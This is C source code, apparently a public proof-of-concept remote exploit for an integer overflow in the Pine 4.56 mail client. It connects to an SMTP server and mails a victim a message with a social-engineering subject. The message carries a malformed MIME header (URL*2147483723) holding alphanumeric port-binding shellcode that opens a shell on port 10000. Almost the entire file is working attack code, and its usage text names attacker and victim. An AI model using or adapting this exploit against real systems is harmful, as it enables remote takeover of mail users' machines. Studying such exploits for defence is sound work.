/* Remote Pine 4.56 Proof of Concept exploit
 * for the integer overflow found by zen-parse 
 * advisory - http://www.packetstormsecurity.com/0309-advisories/09.10.03.txt
 * By - Gyan Chawdhary (gunnu45@hotmail.com) Pune, India
 *
 * greets -> zen-parse (Cool bug)
 * The_Itch -> Where have u been ?
 * & The Yahoo.com Pen test mailing list (great job guys)   		
 */

/* NOTE - This code will not work on most/all pine versions, as it was just 
 * coded to test the vulnerability.
 *
 * Tested on Redhat 7.0 with pine4.56
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <errno.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int sock;
struct sockaddr_in s;
char buffer[1024];
char mail[1024];

/* Converted bighawks port-binding shellcode
 * to Aplha Numeric chars using asc.c from
 * p57-0x0f.txt by rix@hert.org (port 10000)
 */
char shellcode[]="LLLLZhH6pYX5H6pYHTPPPWRPPaRTSVWBRDJfhfKDTY01RUaAfhTLfXf1Doaf1"
"toajJX0Doc0toc0Tod0TokjtX0Dol0tol0TonjGX0Doo0toof1topfhvjfXf1Dou0TozGjtX0Doz0T""ozG0tozGjDX0DozGGGG0tozGjmY0Loz0TozG0TozGG0TozGjNY0Loz0TozG0TozGG0tozGj5X0DozG""0TozGjFX0Doz0tozGGGG0tozGjrY0Loz0tozGG0tozGG0tozGj5Y0Loz0TozG0tozGjiX0Doz0tozG""0tozGjhY0Loz0tozG0tozGjtX0DozGG0tozGj7Y0Loz0TozGGfhEffYf1Lozf1TozGGGGGjYY0LozG""GGGfhAyfYf1LozGGGG0tozGjyY0Loz0tozGGG0tozGjGX0Doz0tozG0tozGjLY0LozG0TozGj7X0Do""z0Toz1pDVOfSCSCSvjK28v8RfhQzCfSvjOTPQWvsOf21OfL129PPWvlCOf2JvOvTOKI2HAXaQhnvsh""hnVbiveQSvYOG2H";

/* send/recieve data */
void xp_socket_read_write(int fd, char *message)
{	
	char buffer[1024];
	memset(buffer, '\0', sizeof(buffer));	
	if (send(fd, message, strlen(message), 0) <= 0) {
		printf("error\n");
		exit(0);
	}
	if (recv(fd, buffer, sizeof(buffer), 0) <= 0) {
		printf("error\n");
		exit(0);
	}
	
}
	
void help(char *s)
{
 printf("Remote exploit for Pine 4.56 by Gyan Chawdhary (gunnu45@hotmail.com)\n");
 printf("Usage: %s <options>\n", s);
 printf("-h <help>\n");
 printf("-i <mailserver\n");
 printf("-f <sender>\n");
 printf("-t <recipient>\n");
 printf("e.g (%s -i my.mailserver -f attacker@host -t victim@host)\n", s);
}

/* Evil msg*/
char *xp_build(char *from, char *to)
{
      sprintf(mail, "DATA\r\n"
        "From: <%s>\r\n"
        "To: <%s>\r\n"
        "cc:\r\n"
        "Subject: [Password Notification]\r\n"
        "MIME-Version: 1.0\r\n"
        "Content-Type: message/external-body; access-type=\"URL\";\r\n"
        "        URL*2147483723=\"%s\";\r\n"
        "Content-Transfer-Encoding: 8bit\r\n"
        "Content-Description: Check this pic out\r\n.\r\n",
         from, to, shellcode);
      printf("%s\n", mail);

      return mail;
}

main(int argc, char **argv)
{
	char ip[16], buf1[512], buf2[512], tmp[1024];
	int c;
		
	if (argc < 2) { 
		help(argv[0]);
		exit(0);
	}
		 
	while ((c = getopt(argc, argv, "h::t:f:i:")) != -1) {
	       
		switch(c) {
			
			case 'h': 
				 help(argv[0]);
				 exit(0);
			case 'i':
			strncpy(ip, optarg, sizeof(ip));
			break;

			case 'f':
			strncpy(buf1, optarg, sizeof(buf1));
			break;

			case 't':
			strncpy(buf2, optarg, sizeof(buf2));
			break;
			
			}
	}

	
	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
	     printf("Error\n");
	     exit(0);
	}
        s.sin_family = AF_INET;
        s.sin_port = htons(25);
        s.sin_addr.s_addr = inet_addr(ip);
        memset(&(s.sin_zero), '\0', 8);

        if (connect(sock, (struct sockaddr *)&s, sizeof(struct sockaddr)) < 0) {        	printf("Error\n");
	}
	
	memset(tmp, '\0', sizeof(tmp));
	sprintf(tmp, "HELO %s\r\n", ip);
	xp_socket_read_write(sock, tmp); 
	memset(tmp, '\0', sizeof(tmp));
	sprintf(tmp, "MAIL FROM: <%s>\r\n", buf1);
        xp_socket_read_write(sock, tmp);
	memset(tmp, '\0', sizeof(tmp));
	sprintf(tmp, "RCPT TO: <%s>\r\n", buf2);
        xp_socket_read_write(sock, tmp);
	memset(tmp, '\0', sizeof(tmp));
        xp_socket_read_write(sock, xp_build(buf1, buf2));
	printf("Done ...\n");
	
	
}